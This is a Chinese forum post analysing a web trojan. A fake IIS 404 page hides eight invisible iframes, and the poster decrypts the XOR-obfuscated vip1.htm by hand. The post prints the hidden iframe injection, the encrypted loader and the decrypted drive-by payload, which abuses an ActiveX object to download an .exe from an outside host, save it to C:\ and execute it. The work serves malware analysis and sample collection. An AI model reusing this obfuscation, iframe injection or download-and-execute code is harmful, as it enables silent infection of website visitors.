【分享】一个Web网马样本获取的简单流程

000000

ding ding

刚好

楼主不错！

a53416557

[  post][/hide]【分享】一个Web木马样本获取的简单流程


　　就昨天晚上发现木马做了一个简单的分析，木马路径是：http://www.****.com/ma/web.htm

　　想办法获取其源码，最好不要用IE浏览器，我是用firefox浏览的，但是看到的是一个404的页码：

　　如下：

　　引用:

　　法找到该页

　　您正在搜索的页面可能已经删除、更名或暂时不可用。

　　请尝试以下操作：

　　* 确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。

　　* 如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。

　　* 单击后退按钮尝试另一个链接。

　　HTTP 错误 404 - 文件或目录未找到。

　　Internet 信息服务 (IIS)

　　技术信息(为技术支持人员提供)

　　* 转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。

　　* 打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问)，然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。

　　不要被骗了，查看下其源码：

　　复制内容到剪贴板代码:

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=GB2312\">
<STYLE type=\"text/css\">
BODY { font: 9pt/12pt 宋体 }
H1 { font: 12pt/15pt 宋体 }
H2 { font: 9pt/12pt 宋体 }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<iframe src=\"vip1.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip2.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip3.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip4.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip5.html\" width=\"0\" height=\"0\" border=\"0\"></iframe>

<iframe src=\"vip6.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip7.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip.htm\" width=\"50\" height=\"0\" border=\"0\"></iframe>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作：</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
</li>

<li>单击<a href=\"javascript:history.back(1)\">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息（为技术支持人员提供）</p>
<ul>
<li>转到 <a href=\"http://go.microsoft.com/fwlink/?linkid=8180\">Microsoft 产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>

<li>打开&ldquo;IIS 帮助&rdquo;（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>
看到里面的框架了吧：
复制内容到剪贴板代码:
<iframe src=\"vip1.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip2.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip3.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip4.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip5.html\" width=\"0\" height=\"0\" border=\"0\"></iframe>

<iframe src=\"vip6.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip7.htm\" width=\"0\" height=\"0\" border=\"0\"></iframe>
<iframe src=\"vip.htm\" width=\"50\" height=\"0\" border=\"0\"></iframe>
真够狠的啊，一下加入了8个，随便那一个看看了，就第一个吧，vip1.htm，源码如下：
复制内容到剪贴板代码:
<script>
strHTML=\"\";
strHTML+=\"%0BJP%17XG%12%14%16F%05%0DZF@%15%02J%1DR%16%16Q%11Y%5B%01RK%05%0AITJ%1\";
strHTML+=\"C%06%1F%5D%15%0AY%1B%15S@%5BD%11%06%12EFK%5BG%16WC%13%17%06%08il%0BW%5\";
strHTML+=\"C%16RE%0FD%11%0AF%3D8%0E%5D%03J%04_TEK@%01%0F%18%5C%05J%0F%02%14VTV%5B\";
strHTML+=\"%11%3Al%08JZ%09CQ@%5D%15L%5B%3F%3BYKQ%10%5BB%16%19%09%07%0A%01BXT%00%0\";
strHTML+=\"C%15%2CU%13U5S@%5BD%11%1A%5B%3F%3BY%19%1FO%3F8%06V%06%13%09%03YM%1D%12\";
strHTML+=\"C%5E%12Q%09ZN%12%0EAW%17Q%15F%0F%13Y@BQG%16%5C%14%17H%05BMV%14@%05J%5D\";
strHTML+=\"%01%18%0FT%00%1E%5D%01%0BI%5BUQ%14%5B%06J%1E%06R%5E%05%11%12RHBXm%15%0\";
strHTML+=\"E@%11D%5C%1F%1DEC%12%16%0EX%00%5D%00%0ALQ%5D%0F%16%5DH%01%1ERe%11%5ERB\";
strHTML+=\"%12Q%14ET%0Dn%10hT%08Vn%06Wd%03Q%06nS%0AQ%3AUT%04e%02W%01kW%05RhW%01%0\";
strHTML+=\"5n%05T%099%03%03Vd%03P%04nW%0F9WTSk%08%00Um%06V%019%16%5DYV%0FhG%5B%09\";
strHTML+=\"SB%16QV%3E%10%09%0B%5DW%5B8DTU@%0CU%0D%3A%16%5E%5D%02%03%0Fn%16%27%7C%\";
strHTML+=\"5C%04rP%0D%04O%04%07%23%0AHWU%22%07e%11%5EXSR%099%16K%09%0A%01uH%08Uq%\";
strHTML+=\"01Q%7EqP%0BwQ%0F9D_%0FSA%0E%0CU%05M%5D%01%07MYV%06%0F%01SXn%13%0AHW%0C\";
strHTML+=\"n%10YM%17%1F%1F%10VK%13%04UX%5B%1C%01%5B%05E_WZ%11%16%06@T%04LW%27%5EW\";
strHTML+=\"%0F%5C%0B%12L%3A%15VQ%0FTT%12hG%1DO%0BDSFE%5CX%03%0A%04%5C%5DLAW%16x%1\";
strHTML+=\"1%12%16%0FULG%00%19%5E%02%18%0CP%1E%19%09DU%17%18%06ZX%09Y__%03%09%14X\";
strHTML+=\"%17F%07%13C%5CB%14RY%5BU%01%5BHs@WU%11%5D*P%5B%00%5BFJn%10\\/P%06%14%0B%\";
strHTML+=\"15X_GKIZ%0A%7C1%606l%10%1EhGdG%1B%0A%13Y@BT%0FS%02%13%07%16FTLG%00@FU%\";
strHTML+=\"099%16%27T%5Dn%16%5EN%04@%11%06MF%07CCV%049D%00%04%19jG9%13%0C%10U%17%\";
strHTML+=\"14%05EFWE%14%0DXn%13%17%5DS%0Fn%10YO%04%14D%01%0A%08%08%13PEFC%12C%05E\";
strHTML+=\"FWE%14%5B%0B%0FP%01W%1C%01@W%03M%00%09%06%0CRZGMRB%12Q%14EU%1BQG@%00I%\";
strHTML+=\"14%06%1A%06MF%07CCW%159D8D%1E%02E%04C%17%0E%09T%0F%05EFWE%14%5B%0B%1C%\";
strHTML+=\"7E%15%5D%5CJn%10%25%7C1%3AFJTLG%00@FJ%04L%0F%05EFWE%14%5B%0B%1Cb%00VVJ\";
strHTML+=\"%1B%09%15N%12%05%11%12RHB%06_%19%12M%15Q%5B%01%09DU%17%18%0B%0F%00%5EO\";
strHTML+=\"E%15QG%16%5C%14%17%07%08%19VC%00_%1FO%0F%12C%11SGFQ%14I%06%5C%1F%12J%5\";
strHTML+=\"B%16W%1A%01L%11%03%15%17TW%1D%17TD%16%5B%0BG%03r%5DVML%03%12EF%06MF%07\";
strHTML+=\"CC%01WK%15%05%10RM%5C%03X%5B%03%1C%06A%12UCC%06I%0AL%09F%12OQ%17FW%13H\";
strHTML+=\"%06%08J%05%5BV@%00%19%1E%5DB%04FFSGFQ%14I%06%5CBXYV%0D%1CQ%10%5C%04%12\";
strHTML+=\"%01%09USV%06E%1F%3A%166%5C%03%5C%7E%1Cu%15H%09%5BR%04L%5B%0D%5Cn@%159D\";
strHTML+=\"8D%1E%02P%10ER%17E%06Z%15%1EazQ%29t%00jT%06mF%07%1AQ%17M%00%17%15T%1Be\";
strHTML+=\"%119%13%1B%3A%169%16JTY%1E%04L%03%18QP%11%5BZJQZ%0BU%04%0BM%1DJ%02%0FJ\";
strHTML+=\"BT%14%5D%15@%3A%0E%10%1B%0Fh2J%1D%1CH%06%3Fh%0E%1D%11Z%17%0F%14%12%094\";
strHTML+=\"9YBT%14%5D%15@FDKBQX%1A%11WI%11%17X%11Q@%0BI%11DZ%00BWP%11XX%08%14%0CZ\";
strHTML+=\"%0FD%1A%1B%14%1E%18%01%5DR%10UW%0CF%1C%15K%0C%12%01N%15%1B%1A%5EL@%0FZ\";
strHTML+=\"%01%5B%11%1E%5D%5CX%0AY%01%12%0CEQ%5C%0BF%09%5E%16%16%05%16%0FGM%0Dh%3\";
strHTML+=\"B%0B%04%5B%01MF_%5CQ%5B%0BL%00JE%08%5D%5C%17%0F%10%10%5C%11%13%16%08%1\";
strHTML+=\"7_R%09BRD%14%0AZ%15U%5EWW%11K%11SC%11%05%10%10WF%17K%0BF%02%07%5BJVG%1\";
strHTML+=\"1X%08P%17U%01CFSF%11%05G@T%11M@%0C%12T%03U%16%03FX\";
function XOR(strV,strPass){
var intPassLength=strPass.length;
var re=\"\";
for(var i=0;i<strV.length;i++){
re+=String.fromCharCode(strV.charCodeAt(i)^strPass.charCodeAt(i%intPassLength));
}
return(re);
}
var STR =
{
hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
b64pad : \"\", /* base-64 pad character. \"=\" for strict RFC compliance */
chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
  
b64_hmac_md5:
  function(key, data) { return binl2b64(core_hmac_md5(key, data)); },
   
b64_md5:
  function(s){ return binl2b64(core_md5(str2binl(s), s.length * this.chrsz));},
   
binl2b64:
  function(binarray){
   var tab = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012****6789+/\";
   var str = \"\";
   for(var i = 0; i < binarray.length * 4; i += 3)
   {
   var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
   | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
   | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
   for(var j = 0; j < 4; j++)
   {
   if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
   else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
   }
   }
   return str;
  },
   
binl2hex:
  function(binarray){
   var hex_tab = this.hexcase ? \"012****6789ABCDEF\" : \"012****6789abcdef\";
   var str = \"\";
   for(var i = 0; i < binarray.length * 4; i++)
   {
   str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
   hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
   }
   return str;
  },
  
binl2str:
  function(bin){
   var str = \"\";
   var mask = (1 << this.chrsz) - 1;
   for(var i = 0; i < bin.length * 32; i += this.chrsz)
   str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
   return str;
  },
   
bit_rol:
  function(num, cnt){return (num << cnt) | (num >>> (32 - cnt));},
   
core_hmac_md5:
  function(key, data){
   var bkey = str2binl(key);
   if(bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);
   
   var ipad = Array(16), opad = Array(16);
   for(var i = 0; i < 16; i++)
   {
   ipad = bkey ^ 0x363****3636;
   opad = bkey ^ 0x5C5C5C5C;
   }
   
   var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
   return core_md5(opad.concat(hash), 512 + 128);
  },
   
core_md5:
  function(x, len){
   /* append padding */
   x[len >> 5] |= 0x80 << ((len) % 32);
   x[(((len + 64) >>> 9) << 4) + 14] = len;
   
   var a = 173****4193;
   var b = -271****3879;
   var c = -173****4194;
   var d = 271****3878;
   
   for(var i = 0; i < x.length; i += 16)
   {
   var olda = a;
   var oldb = b;
   var oldc = c;
   var oldd = d;
   
   a = this.md5_ff(a, b, c, d, x[i+ 0], 7 , -680****6936);
   d = this.md5_ff(d, a, b, c, x[i+ 1], 12, -389****4586);
   c = this.md5_ff(c, d, a, b, x[i+ 2], 17, 606****5819);
   b = this.md5_ff(b, c, d, a, x[i+ 3], 22, -104****5330);
   a = this.md5_ff(a, b, c, d, x[i+ 4], 7 , -176****8897);
   d = this.md5_ff(d, a, b, c, x[i+ 5], 12, 120****0426);
   c = this.md5_ff(c, d, a, b, x[i+ 6], 17, -147****1341);
   b = this.md5_ff(b, c, d, a, x[i+ 7], 22, -457****5983);
   a = this.md5_ff(a, b, c, d, x[i+ 8], 7 , 177****5416);
   d = this.md5_ff(d, a, b, c, x[i+ 9], 12, -195****4417);
   c = this.md5_ff(c, d, a, b, x[i+10], 17, -42***63);
   b = this.md5_ff(b, c, d, a, x[i+11], 22, -199****4162);
   a = this.md5_ff(a, b, c, d, x[i+12], 7 , 180****3682);
   d = this.md5_ff(d, a, b, c, x[i+13], 12, -403****1101);
   c = this.md5_ff(c, d, a, b, x[i+14], 17, -150****2290);
   b = this.md5_ff(b, c, d, a, x[i+15], 22, 123****5329);
   
   a = this.md5_gg(a, b, c, d, x[i+ 1], 5 , -165****6510);
   d = this.md5_gg(d, a, b, c, x[i+ 6], 9 , -106****1632);
   c = this.md5_gg(c, d, a, b, x[i+11], 14, 643****7713);
   b = this.md5_gg(b, c, d, a, x[i+ 0], 20, -373****7302);
   a = this.md5_gg(a, b, c, d, x[i+ 5], 5 , -701****8691);
   d = this.md5_gg(d, a, b, c, x[i+10], 9 , 380****6083);
   c = this.md5_gg(c, d, a, b, x[i+15], 14, -660****8335);
   b = this.md5_gg(b, c, d, a, x[i+ 4], 20, -405****7848);
   a = this.md5_gg(a, b, c, d, x[i+ 9], 5 , 568****6438);
   d = this.md5_gg(d, a, b, c, x[i+14], 9 , -101****3690);
   c = this.md5_gg(c, d, a, b, x[i+ 3], 14, -187****3961);
   b = this.md5_gg(b, c, d, a, x[i+ 8], 20, 116****1501);
   a = this.md5_gg(a, b, c, d, x[i+13], 5 , -144****1467);
   d = this.md5_gg(d, a, b, c, x[i+ 2], 9 , -514****3784);
   c = this.md5_gg(c, d, a, b, x[i+ 7], 14, 173****8473);
   b = this.md5_gg(b, c, d, a, x[i+12], 20, -192****7734);
   
   a = this.md5_hh(a, b, c, d, x[i+ 5], 4 , -37***58);
   d = this.md5_hh(d, a, b, c, x[i+ 8], 11, -202****4463);
   c = this.md5_hh(c, d, a, b, x[i+11], 16, 183****0562);
   b = this.md5_hh(b, c, d, a, x[i+14], 23, -353****9556);
   a = this.md5_hh(a, b, c, d, x[i+ 1], 4 , -153****2060);
   d = this.md5_hh(d, a, b, c, x[i+ 4], 11, 127****3353);
   c = this.md5_hh(c, d, a, b, x[i+ 7], 16, -155****7632);
   b = this.md5_hh(b, c, d, a, x[i+10], 23, -109****0640);
   a = this.md5_hh(a, b, c, d, x[i+13], 4 , 681****9174);
   d = this.md5_hh(d, a, b, c, x[i+ 0], 11, -358****7222);
   c = this.md5_hh(c, d, a, b, x[i+ 3], 16, -722****1979);
   b = this.md5_hh(b, c, d, a, x[i+ 6], 23, 760****9189);
   a = this.md5_hh(a, b, c, d, x[i+ 9], 4 , -640****4487);
   d = this.md5_hh(d, a, b, c, x[i+12], 11, -421****5835);
   c = this.md5_hh(c, d, a, b, x[i+15], 16, 530****2520);
   b = this.md5_hh(b, c, d, a, x[i+ 2], 23, -995****8651);
   
   a = this.md5_ii(a, b, c, d, x[i+ 0], 6 , -198****0844);
   d = this.md5_ii(d, a, b, c, x[i+ 7], 10, 112****1415);
   c = this.md5_ii(c, d, a, b, x[i+14], 15, -141****4905);
   b = this.md5_ii(b, c, d, a, x[i+ 5], 21, -574****4055);
   a = this.md5_ii(a, b, c, d, x[i+12], 6 , 170****5571);
   d = this.md5_ii(d, a, b, c, x[i+ 3], 10, -189****6606);
   c = this.md5_ii(c, d, a, b, x[i+10], 15, -10***23);
   b = this.md5_ii(b, c, d, a, x[i+ 1], 21, -205****2799);
   a = this.md5_ii(a, b, c, d, x[i+ 8], 6 , 187****3359);
   d = this.md5_ii(d, a, b, c, x[i+15], 10, -306****1744);
   c = this.md5_ii(c, d, a, b, x[i+ 6], 15, -156****8380);
   b = this.md5_ii(b, c, d, a, x[i+13], 21, 130****1649);
   a = this.md5_ii(a, b, c, d, x[i+ 4], 6 , -145****3070);
   d = this.md5_ii(d, a, b, c, x[i+11], 10, -112****0379);
   c = this.md5_ii(c, d, a, b, x[i+ 2], 15, 718****7259);
   b = this.md5_ii(b, c, d, a, x[i+ 9], 21, -343****5551);
   
   a = this.safe_add(a, olda);
   b = this.safe_add(b, oldb);
   c = this.safe_add(c, oldc);
   d = this.safe_add(d, oldd);
   }
   return Array(a, b, c, d);
  },
   
hex_hmac_md5:function(key, data){ return this.binl2hex(this.core_hmac_md5(key, data)); },
  
hex_md5:function(s){return this.binl2hex(this.core_md5(this.str2binl(s), s.length * this.chrsz));},
md5:function(s){return(this.hex_md5(s));},

md5_cmn:function(q, a, b, x, s, t){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a, q), this.safe_add(x, t)), s),b);},

md5_ff:function(a, b, c, d, x, s, t){return this.md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);},

md5_gg:function(a, b, c, d, x, s, t){return this.md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);},

md5_hh:function(a, b, c, d, x, s, t){return this.md5_cmn(b ^ c ^ d, a, b, x, s, t);},

md5_ii:function(a, b, c, d, x, s, t){return this.md5_cmn(c ^ (b | (~d)), a, b, x, s, t);},

md5_vm_test:function(){return hex_md5(\"abc\") == \"900****0983cd24fb0d6963f7d28e17f72\";},
  
safe_add:
  function(x, y){
   var lsw = (x & 0xFFFF) + (y & 0xFFFF);
   var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
   return (msw << 16) | (lsw & 0xFFFF);
  },
   
str2binl:
  function(str){
   var bin = Array();
   var mask = (1 << this.chrsz) - 1;
   for(var i = 0; i < str.length * this.chrsz; i += this.chrsz)
   bin[i>>5] |= (str.charCodeAt(i / this.chrsz) & mask) << (i%32);
   return bin;
  },

str_hmac_md5:function(key, data){ return binl2str(core_hmac_md5(key, data)); },

str_md5:function(s){ return binl2str(core_md5(str2binl(s), s.length * this.chrsz));}
}
function performPage(strPass){
if(strPass){
document.cookie=\"password=\"+escape(strPass);
document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}

var pass=\"%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26\";
if(pass){
pass=unescape(pass);
document.write(XOR(unescape(strHTML),STR.md5(pass)));
return(false);
}
}
performPage();
</script>
是不是比较晕啊，这么多代码，一个一个来分析下：
其中strHTML量是被加密后的代码字符串.

函数：function XOR(strV,strPass)是用来解密的，还设置了一个密码，嘿嘿，感觉挺搞笑的，js端设置密码！

主要看下最后一个函数了，我加入了一些注释：
复制内容到剪贴板代码:
function performPage(strPass){
if(strPass){
document.cookie=\"password=\"+escape(strPass);//将代码用escape加密后写入cookie中，判断是否已经执行过
document.write(XOR(unescape(strHTML),STR.md5(strPass)));//将上面的strHTML解密后执行
return(false);
}//判断strPass是否存在，存在则执行下面两语句。

var pass=\"%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26\";//密码了
if(pass){
pass=unescape(pass);//将代码用unescape函数解密，等会我们就会看到了，稍等。
document.write(XOR(unescape(strHTML),STR.md5(pass)));//将上面的strHTML用XOR函数解密后执行。
return(false);
}
}
最好就是执行函数performPage()了。

下面我们看看其源码里都是什么东西：

将vip1.htm另存为本地。

先看看其密码是什么来：

将函数performPage修改为如下，然后浏览器浏览vip1.htm：
复制内容到剪贴板代码:
function performPage(strPass){
if(strPass){
//document.cookie=\"password=\"+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}

var pass=\"%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26\";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
document.write(pass);
return(false);
}
}
performPage();
</script>
浏览器显示：
引用:
密匙可以是中文，或任意字符
汗一个。下面看他木马代码怎么写的：

修改函数performPage以下部分如下：
复制内容到剪贴板代码:
function performPage(strPass){
if(strPass){
//document.cookie=\"password=\"+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}

var pass=\"%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26\";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
//document.write(pass);
document.getElementById( \"muma\" ).value = XOR(unescape(strHTML),STR.md5(pass));
return(false);
}
}
//performPage();
</script>
<textarea id=\"muma\" name=\"muma\" rows=\"10\" cols=\"50\"></textarea>
<script language=javascript>performPage();</script>
浏览下vip1.htm看看，strHTML的原始代码就出来了：
复制内容到剪贴板代码:
<script src=http://cs.cskick.cn/cs/c.js></script>www.cuteqq.cn
<noscript>
<iframe src=*></iframe>
</noscript>
<script language=\"JavaScript\">
<!--
document.writeln(\"<script>var cuteqq,cuteqq2,id,id2,id3,id4,idx,dk;cuteqq=\\\"http://www.kj1888.com/8.exe\\\";cuteqq2=\\\"\\103\\72\\134\\134\\123\\120\\117\\117\\111\\123\\126\\56\\105\\130\\105\\\";id=\\\"classid\\\";id2=\\\"clsid:\\\";id3=\\\"BD96C556-65A3-11D0\\\";id4=\\\"-983A-00C04FC29E36\\\";idx=id2+id3+id4;dk=\\\"open\\\";try{var ado=(document.createElement(\\\"object\\\"));var d=1;ado.setAttribute(id,idx);var chilam=1;var cuteqqcn=ado.CreateObject(\\\"Microsoft.xmlHTTP\\\",\\\"\\\");var f=1;var cuteqq3=\\\"Ado\\\";var cuteqq4=\\\"db.St\\\";var cuteqq5=\\\"ream\\\";var g=1;var wwwcuteqqcn=ado.createobject(cuteqq3+cuteqq4+cuteqq5,\\\"\\\");var h=1;cuteqqcn.Open(\\\"GET\\\",cuteqq,0);cuteqqcn.Send();wwwcuteqqcn.type=1;var n=1;wwwcuteqqcn.open();wwwcuteqqcn.write(cuteqqcn.responseBody);wwwcuteqqcn.savetofile(cuteqq2,2);wwwcuteqqcn.close();var cuteqqcns=ado.createobject(\\\"ShelL.Application\\\",\\\"\\\");cuteqqcns.SHeLLeXecUte(cuteqq2,\\\"\\\",\\\"\\\",dk,0);}catch(chilam){};</script\\>\");
//-->
</script>
<script type=\"text/jscript\">function init() { document.write(\"\");}window.onload = init;</script>
<body oncontextmenu=\"return false\" onselectstart=\"return false\" ondragstart=\"return false\">



　　木马exe文件地址也出来了，剩下来的朋友们就可以拿到样本来分析了!